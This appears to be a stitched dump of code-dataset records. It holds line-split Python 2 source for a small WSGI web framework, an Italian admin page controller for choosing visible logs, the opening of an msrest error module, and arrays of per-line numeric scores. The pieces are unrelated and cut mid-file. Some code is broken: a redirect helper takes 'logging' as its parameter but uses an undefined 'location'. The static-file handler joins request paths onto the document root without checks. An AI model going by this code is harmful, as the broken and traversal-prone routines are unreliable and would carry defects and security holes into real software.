RedirectError(301, location)\n", "\n", "\n", "def found(logging):\n", " return Redirection(302, location)\n", "\n", "\n", "def seeother(location):\n", " return RedirectError(303, location)\n", "\n", "\n", "def _to_str(s):\n", " if isinstance(s, str):\n", " return s\n", " if isinstance(s, unicode):\n", " return s.encode('utf-8')\n", " return str(s)\n", "\n", "\n", "def _to_unicode(s, encoding='utf-8'):\n", " return s.decode('utf-8')\n", "\n", "\n", "def _quote(s, encoding='utf-8'):\n", " if isinstance(s, unicode):\n", " s = s.encode(encoding)\n", " return urllib.quote(s)\n", "\n", "\n", "def _unquote(s, encoding='utf-8'):\n", " return urllib.unquote(s).decode(encoding)\n", "\n", "\n", "def get(path):\n", " def _decorator(func):\n", " func.__web_route__ = path\n", " func.__web_method__ = 'GET'\n", " return func\n", " return _decorator\n", "\n", "\n", "def post(path):\n", " def _decorator(func):\n", " func.__web_route__ = path\n", " func.__web_method__ = 'POST'\n", " return func\n", " return _decorator\n", "\n", "_re_route = re.compile(r'(\\:[a-zA-Z_]\\w*)')\n", "\n", "\n", "def _build_regex(path):\n", " r'''\n", " Convert route path to regex.\n", "\n", " >>> _build_regex('/path/to/:file')\n", " '^\\\\/path\\\\/to\\\\/(?P<file>[^\\\\/]+)$'\n", " >>> _build_regex('/:user/:comments/list')\n", " '^\\\\/(?P<user>[^\\\\/]+)\\\\/(?P<comments>[^\\\\/]+)\\\\/list$'\n", " >>> _build_regex(':id-:pid/:w')\n", " '^(?P<id>[^\\\\/]+)\\\\-(?P<pid>[^\\\\/]+)\\\\/(?P<w>[^\\\\/]+)$'\n", " '''\n", " re_list = ['^']\n", " var_list = []\n", " is_var = False\n", " for v in _re_route.split(path):\n", " if is_var:\n", " var_name = v[1:]\n", " var_list.append(var_name)\n", " re_list.append(r'(?P<%s>[^\\/]+)' % var_name)\n", " else:\n", " s = ''\n", " for ch in v:\n", " if ch >= '0' and ch <= '9':\n", " s = s + ch\n", " elif ch >= 'A' and ch <= 'Z':\n", " s = s + ch\n", " elif ch >= 'a' and ch <= 'z':\n", " s = s + ch\n", " else:\n", " s = s + '\\\\' + ch\n", " re_list.append(s)\n", " is_var = 
not is_var\n", " re_list.append('$')\n", " return ''.join(re_list)\n", "\n", "\n", "class Route(object):\n", "\n", " def __init__(self, func):\n", " self.path = func.__web_route__\n", " self.method = func.__web_method__\n", " self.is_static = _re_route.search(self.path) is None\n", " if not self.is_static:\n", " self.route = re.compile(_build_regex(self.path))\n", " self.func = func\n", "\n", " def match(self, url):\n", " m = self.route.match(url)\n", " if m:\n", " return m.groups()\n", " return None\n", "\n", " def __call__(self, *args):\n", " return self.func(*args)\n", "\n", " def __str__(self):\n", " if self.is_static:\n", " return 'Route(static,%s,path=%s)' % (self.method, self.path)\n", " return 'Route(dynamic,%s,path=%s)' % (self.method, self.path)\n", "\n", " __repr__ = __str__\n", "\n", "\n", "def _static_file_generator(fpath):\n", " BLOCK_SIZE = 8192\n", " with open(fpath, 'rb') as f:\n", " block = f.read(BLOCK_SIZE)\n", " while block:\n", " yield block\n", " block = f.read(BLOCK_SIZE)\n", "\n", "\n", "class StaticFileRoute(object):\n", "\n", " def __init__(self):\n", " self.method = 'GET'\n", " self.is_static = False\n", " self.route = re.compile('^/static/(.+)$')\n", "\n", " def match(self, url):\n", " if url.startswith('/static/'):\n", " return (url[1:],)\n", " return None\n", "\n", " def __call__(self, *args):\n", " fpath = os.path.join(ctx.application.document_root, args[0])\n", " if not os.path.isfile(fpath):\n", " raise notfound()\n", " fext = os.path.splitext(fpath)[1]\n", " ctx.response.content_type = mimetypes.types_map.get(\n", " fext.lower(), 'application/octet-stream')\n", " return _static_file_generator(fpath)\n", "\n", "\n", "def favicon_handler():\n", " return static_file_handler('/favicon.ico')\n", "\n", "\n", "class MultipartFile(object):\n", "\n", " def __init__(self, storage):\n", " self.filename = _to_unicode(storage.filename)\n", " self.file = storage.file\n", "\n", "\n", "class Request(object):\n", "\n", " def __init__(self, 
environ):\n", " self._environ = environ\n", "\n", " def _parse_input(self):\n", "\n", " def _convert(item):\n", " if isinstance(item, list):\n", " return [_to_unicode(i.value) for i in item]\n", " if item.filename:\n", " return MultipartFile(item)\n", " return _to_unicode(item.value)\n", "\n", " fs = cgi.FieldStorage(\n", " fp=self._environ['wsgi.input'], environ=self._environ, keep_blank_values=True)\n", " inputs = dict()\n", " for key in fs:\n", " inputs[key] = _convert(fs[key])\n", " return inputs\n", "\n", " def _get_raw_input(self):\n", " if not hasattr(self, '_raw_input'):\n", " self._raw_input = self._parse_input()\n", " return self._raw_input\n", "\n", " def __getitem__(self, key):\n", " r = self._get_raw_input()[key]\n", " if isinstance(r, list):\n", " return r[0]\n", " return r\n", "\n", " def get(self, key, default=None):\n", " r = self._get_raw_input().get(key, default)\n", " if isinstance(r, list):\n", " return r[0]\n", " return r\n", "\n", " def gets(self, key):\n", " r = self._get_raw_input()[key]\n", " if isinstance(r, list):\n", " return r[:]\n", " return r\n", "\n", " def input(self, **kw):\n", " copy = Dict(**kw)\n", " raw = self._get_raw_input()\n", " for k, v in raw.iteritems():\n", " copy[k] = v[0] if isinstance(v, list) else v\n", " return copy\n", "\n", " def get_body(self):\n", " fp = self._environ['wsgi.input']\n", " return fp.read()\n", "\n", " @property\n", " def remote_addr(self):\n", " return self._environ.get('REMOTE_ADDR', '0.0.0.0')\n", "\n", " @property\n", " def document_root(self):\n", " return self._environ.get('DOCUMENT_ROOT', '')\n", "\n", " @property\n", " def query_string(self):\n", " return self._environ.get('QUERY_STRING', '')\n", "\n", " @property\n", " def environ(self):\n", " return self._environ\n", "\n", " @property\n", " def request_method(self):\n", " return self._environ['REQUEST_METHOD']\n", "\n", " @property\n", " def path_info(self):\n", " return urllib.unquote(self._environ.get('PATH_INFO', ''))\n", "\n", " 
@property\n", " def host(self):\n", " return self._environ.get('HTTP_HOST', '')\n", "\n", " def _get_headers(self):\n", " if not hasattr(self, '_headers'):\n", " hdrs = {}\n", " for k, v in self._environ.iteritems():\n", " if k.startswith('HTTP_'):\n", " hdrs[k[5:].replace('_', '-').upper()] = v.decode('utf-8')\n", " self._headers = hdrs\n", " return self._headers\n", "\n", " @property\n", " def headers(self):\n", " return dict(**self._get_headers())\n", "\n", " def header(self, header, default=None):\n", " return self._get_headers().get(header.upper(), default)\n", "\n", " def _get_cookies(self):\n", " if not hasattr(self, '_cookies'):\n", " cookies = {}\n", " cookie_str = self._environ.get('HTTP_COOKIE')\n", " if cookie_str:\n", " for c in cookie_str.split(';'):\n", " pos = c.find('=')\n", " if pos > 0:\n", " cookies[c[:pos].strip()] = _unquote(c[pos+1:])\n", " self._cookies = cookies\n", " return self._cookies\n", "\n", " @property\n", " def cookies(self):\n", " return Dict(**self._get_cookies())\n", "\n", " def cookie(self, name, default=None):\n", " return self._get_cookies().get(name, default)\n", "\n", "UTC_0 = UTC('+00:00')\n", "\n", "\n", "class Response(object):\n", "\n", " def __init__(self):\n", " self._status = '200 OK'\n", " self._headers = {'CONTENT-TYPE': 'text/html; charset=utf-8'}\n", "\n", " def unset_header(self, name):\n", " key = name.upper()\n", " if key not in _RESPONSE_HEADER_DICT:\n", " key = name\n", " if key in self._headers:\n", " del self._headers[key]\n", "\n", " def set_header(self, name, value):\n", " key = name.upper()\n", " if key not in _RESPONSE_HEADER_DICT:\n", " key = name\n", " self._headers[key] = _to_str(value)\n", "\n", " def header(self, name):\n", " key = name.upper()\n", " if key not in _RESPONSE_HEADER_DICT:\n", " key = name\n", " return self._headers.get(key)\n", "\n", " @property\n", " def headers(self):\n", " L = [(_RESPONSE_HEADER_DICT.get(k, k), v)\n", " for k, v in self._headers.iteritems()]\n", " if 
hasattr(self, '_cookies'):\n", " for v in self._cookies.itervalues():\n", " L.append(('Set-Cookie', v))\n", " L.append(_HEADER_X_POWERED_BY)\n", " return L\n", "\n", " @property\n", " def content_type(self):\n", " return self.header('CONTENT-TYPE')\n", "\n", " @content_type.setter\n", " def content_type(self, value):\n", " if value:\n", " self.set_header('CONTENT-TYPE', value)\n", " else:\n", " self.unset_header('CONTENT-TYPE')\n", "\n", " @property\n", " def content_length(self):\n", " return self.header('CONTENT-LENGTH')\n", "\n", " @content_length.setter\n", " def content_length(self, value):\n", " self.set_header('CONTENT-LENGTH', str(value))\n", "\n", " def delete_cookie(self, name):\n", " self.set_cookie(name, '__deleted__', expires=0)\n", "\n", " def set_cookie(self, name, value, max_age=None, expires=None, path='/', domain=None, secure=False, http_only=True):\n", " if not hasattr(self, '_cookies'):\n", " self._cookies = {}\n", " L = ['%s=%s' % (_quote(name), _quote(value))]\n", " if expires is not None:\n", " if isinstance(expires, (float, int, long)):\n", " L.append('Expires=%s' % datetime.datetime.fromtimestamp(\n", " expires, UTC_0).strftime('%a, %d-%b-%Y %H:%M:%S GMT'))\n", " if isinstance(expires, (datetime.date, datetime.datetime)):\n", " L.append('Expires=%s' % expires.astimezone(\n", " UTC_0).strftime('%a, %d-%b-%Y %H:%M:%S GMT'))\n", " elif isinstance(max_age, (int, long)):\n", " L.append('Max-Age=%d' % max_age)\n", " L.append('Path=%s' % path)\n", " if domain:\n", " L.append('Domain=%s' % domain)\n", " if secure:\n", " L.append('Secure')\n", " if http_only:\n", " L.append('HttpOnly')\n", " self._cookies[name] = '; '.join(L)\n", "\n", " def unset_cookie(self, name):\n", " if hasattr(self, '_cookies'):\n", " if name in self._cookies:\n", " del self._cookies[name]\n", "\n", " @property\n", " def status_code(self):\n", " return int(self._status[:3])\n", "\n", " @property\n", " def status(self):\n", " return self._status\n", "\n", " @status.setter\n", 
" def status(self, value):\n", " if isinstance(value, (int, long)):\n", " if 100 <= value <= 999:\n", " st = _RESPONSE_STATUSES.get(value, '')\n", " if st:\n", " self._status = '%d %s' % (value, st)\n", " else:\n", " self._status = str(value)\n", " else:\n", " raise ValueError('Bad response code: %d' % value)\n", " elif isinstance(value, basestring):\n", " if isinstance(value, unicode):\n", " value = value.encode('utf-8')\n", " if _RE_RESPONSE_STATUS.match(value):\n", " self._status = value\n", " else:\n", " raise ValueError('Bad response code: %s' % value)\n", " else:\n", " raise TypeError('Bad type of response code.')\n", "\n", "\n", "class Template(object):\n", "\n", " def __init__(self, template_name, **kw):\n", " self.template_name = template_name\n", " self.model = dict(**kw)\n", "\n", "\n", "class TemplateEngine(object):\n", "\n", " def __call__(self, path, model):\n", " return '<!-- override this method to render template -->'\n", "\n", "\n", "class Jinja2TemplateEngine(TemplateEngine):\n", "\n", " def __init__(self, templ_dir, **kw):\n", " from jinja2 import Environment, FileSystemLoader\n", " if not 'autoescape' in kw:\n", " kw['autoescape'] = True\n", " self._env = Environment(loader=FileSystemLoader(templ_dir), **kw)\n", "\n", " def add_filter(self, name, fn_filter):\n", " self._env.filters[name] = fn_filter\n", "\n", " def __call__(self, path, model):\n", " return self._env.get_template(path).render(**model).encode('utf-8')\n", "\n", "\n", "def _default_error_handler(e, start_response, is_debug):\n", " if isinstance(e, HttpError):\n", " logging.info('HttpError: %s' % e.status)\n", " headers = e.headers[:]\n", " headers.append(('Content-Type', 'text/html'))\n", " start_response(e.status, headers)\n", " return ('<html><body><h1>%s</h1></body></html>' % e.status)\n", " logging.exception('Exception:')\n", " start_response('500 Internal Server Error', [\n", " ('Content-Type', 'text/html'), _HEADER_X_POWERED_BY])\n", " if is_debug:\n", " return _debug()\n", 
" return ('<html><body><h1>500 Internal Server Error</h1><h3>%s</h3></body></html>' % str(e))\n", "\n", "\n", "def view(path):\n", " def _decorator(func):\n", " @functools.wraps(func)\n", " def _wrapper(*args, **kw):\n", " r = func(*args, **kw)\n", " if isinstance(r, dict):\n", " logging.info('return Template')\n", " return Template(path, **r)\n", " raise ValueError(\n", " 'Expect return a dict when using @view() decorator.')\n", " return _wrapper\n", " return _decorator\n", "\n", "\n", "_RE_INTERCEPTROR_STARTS_WITH = re.compile(r'^([^\\*\\?]+)\\*?$')\n", "_RE_INTERCEPTROR_ENDS_WITH = re.compile(r'^\\*([^\\*\\?]+)$')\n", "\n", "\n", "def _build_pattern_fn(pattern):\n", " m = _RE_INTERCEPTROR_STARTS_WITH.match(pattern)\n", " if m:\n", " return lambda p: p.startswith(m.group(1))\n", " m = _RE_INTERCEPTROR_ENDS_WITH.match(pattern)\n", " if m:\n", " return lambda p: p.endswith(m.group(1))\n", " raise ValueError('Invalid pattern definition in interceptor.')\n", "\n", "\n", "def interceptor(pattern='/'):\n", " def _decorator(func):\n", " func.__interceptor__ = _build_pattern_fn(pattern)\n", " return func\n", " return _decorator\n", "\n", "\n", "def _build_interceptor_fn(func, next):\n", " def _wrapper():\n", " if func.__interceptor__(ctx.request.path_info):\n", " return func(next)\n", " else:\n", " return next()\n", " return _wrapper\n", "\n", "\n", "def _build_interceptor_chain(last_fn, *interceptors):\n", " L = list(interceptors)\n", " L.reverse()\n", " fn = last_fn\n", " for f in L:\n", " fn = _build_interceptor_fn(f, fn)\n", " return fn\n", "\n", "\n", "def _load_module(model_name):\n", " last_dot = model_name.rfind('.')\n", " if last_dot == (-1):\n", " return __import__(model_name, globals(), locals())\n", " from_module = model_name[:last_dot]\n", " import_module = model_name[last_dot+1:]\n", " m = __import__(from_module, globals(), locals(), [import_module])\n", " return getattr(m, import_module)\n", "\n", "\n", "class WSGIApplication(object):\n", "\n", " def 
__init__(self, document_root=None, **kw):\n", " self._running = False\n", " self._document_root = document_root\n", "\n", " self._interceptors = []\n", " self._templage_engine = None\n", "\n", " self._get_static = {}\n", " self._post_static = {}\n", "\n", " self._get_dynamic = []\n", " self._post_dynamic = []\n", "\n", " def _check_not_running(self):\n", " if self._running:\n", " raise RuntimeError('Cannot modify WSGIApplication when running.')\n", "\n", " @property\n", " def template_engine(self):\n", " return self._templage_engine\n", "\n", " @template_engine.setter\n", " def template_engine(self, engine):\n", " self._check_not_running()\n", " self._templage_engine = engine\n", "\n", " def add_module(self, mod):\n", " self._check_not_running()\n", " m = mod if type(mod) == types.ModuleType else _load_module(mod)\n", " logging.info('Add module: %s' % m.__name__)\n", " for name in dir(m):\n", " fn = getattr(m, name)\n", " if callable(fn) and hasattr(fn, '__web_route__') and hasattr(fn, '__web_method__'):\n", " self.add_url(fn)\n", "\n", " def add_url(self, func):\n", " self._check_not_running()\n", " route = Route(func)\n", " if route.is_static:\n", " if route.method == 'GET':\n", " self._get_static[route.path] = route\n", " if route.method == 'POST':\n", " self._post_static[route.path] = route\n", " else:\n", " if route.method == 'GET':\n", " self._get_dynamic.append(route)\n", " if route.method == 'POST':\n", " self._post_dynamic.append(route)\n", " logging.info('Add route: %s' % str(route))\n", "\n", " def add_interceptor(self, func):\n", " self._check_not_running()\n", " self._interceptors.append(func)\n", " logging.info('Add interceptor: %s' % str(func))\n", "\n", " def get_wsgi_application(self, debug=False):\n", " self._check_not_running()\n", " if debug:\n", " self._get_dynamic.append(StaticFileRoute())\n", " self._running = True\n", "\n", " _application = Dict(document_root=self._document_root)\n", "\n", " def fn_route():\n", " request_method = 
ctx.request.request_method\n", " path_info = ctx.request.path_info\n", " if request_method == 'GET':\n", " fn = self._get_static.get(path_info, None)\n", " if fn:\n", " return fn()\n", " for fn in self._get_dynamic:\n", " args = fn.match(path_info)\n", " if args:\n", " return fn(*args)\n", " raise notfound()\n", " if request_method == 'POST':\n", " fn = self._post_static.get(path_info, None)\n", " if fn:\n", " return fn()\n", " for fn in self._post_dynamic:\n", " args = fn.match(path_info)\n", " if args:\n", " return fn(*args)\n", " raise notfound()\n", " raise badrequest()\n", "\n", " fn_exec = _build_interceptor_chain(fn_route, *self._interceptors)\n", "\n", " def wsig(env, start_response):\n", " ctx.application = _application\n", " ctx.request = Request(env)\n", " response = ctx.response = Response()\n", " try:\n", " r = fn_exec()\n", " if isinstance(r, Template):\n", " r = self._templage_engine(r.template_name, r.model)\n", " if isinstance(r, unicode):\n", " r = r.encode('utf-8')\n", " if r is None:\n", " r = []\n", " start_response(response.status, response.headers)\n", " return r\n", " except RedirectError, e:\n", " response.set_header('Location', e.location)\n", " start_response(e.status, response.headers)\n", " return []\n", " except HttpError, e:\n", " start_response(e.status, response.headers)\n", " return ['<html><body><h1>', e.status, '</h1></body></html>']\n", " except Exception, e:\n", " logging.exception(e)\n", " if not debug:\n", " start_response('500 Internal Server Error', [])\n", " return ['<html><body><h1>500 Internal Server Error</h1></body></html>']\n", "\n", " exc_type, exc_value, exc_traceback = sys.exc_info()\n", " fp = StringIO()\n", " traceback.print_exception(\n", " exc_type, exc_value, exc_traceback, file=fp)\n", " stacks = fp.getvalue()\n", " fp.close()\n", " start_response('500 Internal Server Error', [])\n", " return [\n", " r'''<html><body><h1>500 Internal Server Error</h1><div style=\"font-family:Monaco, Menlo, Consolas, 'Courier 
New', monospace;\"><pre>''',\n", " stacks.replace('<', '&lt;').replace('>', '&gt;'),\n", " '</pre></div></body></html>']\n", " finally:\n", " del ctx.application\n", " del ctx.request\n", " del ctx.response\n", "\n", " # status = '200 OK'\n", " # response_headers = [\n", " # ('Content-Type', 'text/plain')\n", " # ]\n", " # start_response(status, response_headers)\n", " # return ['Hello world from wsgia!\\n']\n", " return wsig\n", "\n", " def run(self, port=9000, host='127.0.0.1'):\n", " from wsgiref.simple_server import make_server\n", " print('application (%s) will start at %s:%s...' %\n", " (self._document_root, host, port))\n", " server = make_server(\n", " host, port, self.get_wsgi_application(debug=True))\n", " server.serve_forever()\n", "\n", "wsgi = WSGIApplication(os.path.dirname(os.path.abspath(__file__)))\n", "\n", "if __name__ == '__main__':\n", " wsgi.run()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013888888888888888, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.00641025641025641, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.014925373134328358, 0, 0, 0 ]
905
0.000306
false
# -*- coding: utf-8 -*- """ Controller della pagina web per la gestione delle opzioni di admin. """ #= IMPORT ====================================================================== import string from src.element import Flags from src.enums import LOG, TRUST from src.web_resource import (WebResource, create_form_row, create_form, create_checklist_of_flags, set_checked_flags) #= CLASSI ====================================================================== class AdminAccountPage(WebResource): TITLE = "Admin Account" ACCOUNT_MUST_EXIST_IN_GET = True ACCOUNT_MUST_EXIST_IN_POST = True MINIMUM_TRUST_ON_GET = TRUST.MASTER MINIMUM_TRUST_ON_POST = TRUST.MASTER def render_GET(self, request, conn): return self.create_page(request, conn) #- Fine Metodo - def render_POST(self, request, conn): if "show_logs" in request.args: set_checked_flags(request, "show_logs", conn.account.show_logs) return self.create_page(request, conn) else: # Capita quando vengono disabilitate tutte le checkbox conn.account.show_logs = Flags(LOG.NONE) return self.create_page(request, conn) #- Fine Metodo - def create_page(self, request, conn): # Prepara il form delle opzioni form_show_logs = [] row = create_form_row(form_show_logs) row.label = "Log Visualizzati" row.field = self.create_checklist_of_logs(conn) row = create_form_row(form_show_logs) row.label = '''<input type="submit" value="Salva" onclick="document.getElementById('form_show_logs').submit();" />''' if request.method == "POST" and "show_logs" in request.args: row.label += ''' <span style="color:green">Opzioni salvate.</span>''' page = "<br>" page += create_form(form_show_logs, "form_show_logs", "admin_account.html", "Scegli i log da visualizzare", show_label=False) page += "<br>" return page #- Fine Metodo - def create_checklist_of_logs(self, conn): """ Concettualmente questa è un override della funzione create_checklist_of_flags in web.py. 
""" page = '''<table>''' for log_element in LOG.elements: if not log_element.is_checkable: continue if conn.account.trust < log_element.trust: continue checked = "" if log_element in conn.account.show_logs: checked = ''' checked="checked"''' page += ''' <tr><td nowrap><input type="checkbox" name="%s" value="%s"%s /> %s</td><td>%s</td></tr>''' % ( "show_logs", log_element.code, checked, log_element, log_element.description) page += '''</table>''' return page #- Fine Metodo -
[ "# -*- coding: utf-8 -*-\n", "\n", "\"\"\"\n", "Controller della pagina web per la gestione delle opzioni di admin.\n", "\"\"\"\n", "\n", "\n", "#= IMPORT ======================================================================\n", "\n", "import string\n", "\n", "from src.element import Flags\n", "from src.enums import LOG, TRUST\n", "from src.web_resource import (WebResource, create_form_row, create_form,\n", " create_checklist_of_flags, set_checked_flags)\n", "\n", "\n", "#= CLASSI ======================================================================\n", "\n", "class AdminAccountPage(WebResource):\n", " TITLE = \"Admin Account\"\n", "\n", " ACCOUNT_MUST_EXIST_IN_GET = True\n", " ACCOUNT_MUST_EXIST_IN_POST = True\n", "\n", " MINIMUM_TRUST_ON_GET = TRUST.MASTER\n", " MINIMUM_TRUST_ON_POST = TRUST.MASTER\n", "\n", " def render_GET(self, request, conn):\n", " return self.create_page(request, conn)\n", " #- Fine Metodo -\n", "\n", " def render_POST(self, request, conn):\n", " if \"show_logs\" in request.args:\n", " set_checked_flags(request, \"show_logs\", conn.account.show_logs)\n", " return self.create_page(request, conn)\n", " else:\n", " # Capita quando vengono disabilitate tutte le checkbox\n", " conn.account.show_logs = Flags(LOG.NONE)\n", " return self.create_page(request, conn)\n", " #- Fine Metodo -\n", "\n", " def create_page(self, request, conn):\n", " # Prepara il form delle opzioni\n", " form_show_logs = []\n", " row = create_form_row(form_show_logs)\n", " row.label = \"Log Visualizzati\"\n", " row.field = self.create_checklist_of_logs(conn)\n", " row = create_form_row(form_show_logs)\n", " row.label = '''<input type=\"submit\" value=\"Salva\" onclick=\"document.getElementById('form_show_logs').submit();\" />'''\n", " if request.method == \"POST\" and \"show_logs\" in request.args:\n", " row.label += ''' <span style=\"color:green\">Opzioni salvate.</span>'''\n", "\n", " page = \"<br>\"\n", " page += create_form(form_show_logs, \"form_show_logs\", 
\"admin_account.html\", \"Scegli i log da visualizzare\", show_label=False)\n", " page += \"<br>\"\n", "\n", " return page\n", " #- Fine Metodo -\n", "\n", " def create_checklist_of_logs(self, conn):\n", " \"\"\"\n", " Concettualmente questa è un override della funzione create_checklist_of_flags\n", " in web.py.\n", " \"\"\"\n", " page = '''<table>'''\n", " for log_element in LOG.elements:\n", " if not log_element.is_checkable:\n", " continue\n", " if conn.account.trust < log_element.trust:\n", " continue\n", " checked = \"\"\n", " if log_element in conn.account.show_logs:\n", " checked = ''' checked=\"checked\"'''\n", " page += ''' <tr><td nowrap><input type=\"checkbox\" name=\"%s\" value=\"%s\"%s /> %s</td><td>%s</td></tr>''' % (\n", " \"show_logs\", log_element.code, checked, log_element, log_element.description)\n", " page += '''</table>'''\n", "\n", " return page\n", " #- Fine Metodo -\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0.024691358024691357, 0, 0, 0, 0.02857142857142857, 0.025, 0, 0, 0, 0, 0.024691358024691357, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0.02040816326530612, 0.02040816326530612, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0.007936507936507936, 0, 0.012195121951219513, 0, 0.043478260869565216, 0.007462686567164179, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008333333333333333, 0.010638297872340425, 0, 0, 0, 0.047619047619047616 ]
80
0.005778
false
# -------------------------------------------------------------------------- # # Copyright (c) Microsoft Corporation. All rights reserved. # # The MIT License (MIT) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the ""Software""), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # # -------------------------------------------------------------------------- from requests import RequestException from msrest.exceptions import ClientException from msrest.serialization import Deserializer from msrest.exceptions import DeserializationError class CloudErrorData(object): """Cloud Error Data object, deserialized from error data returned during a failed REST API call. 
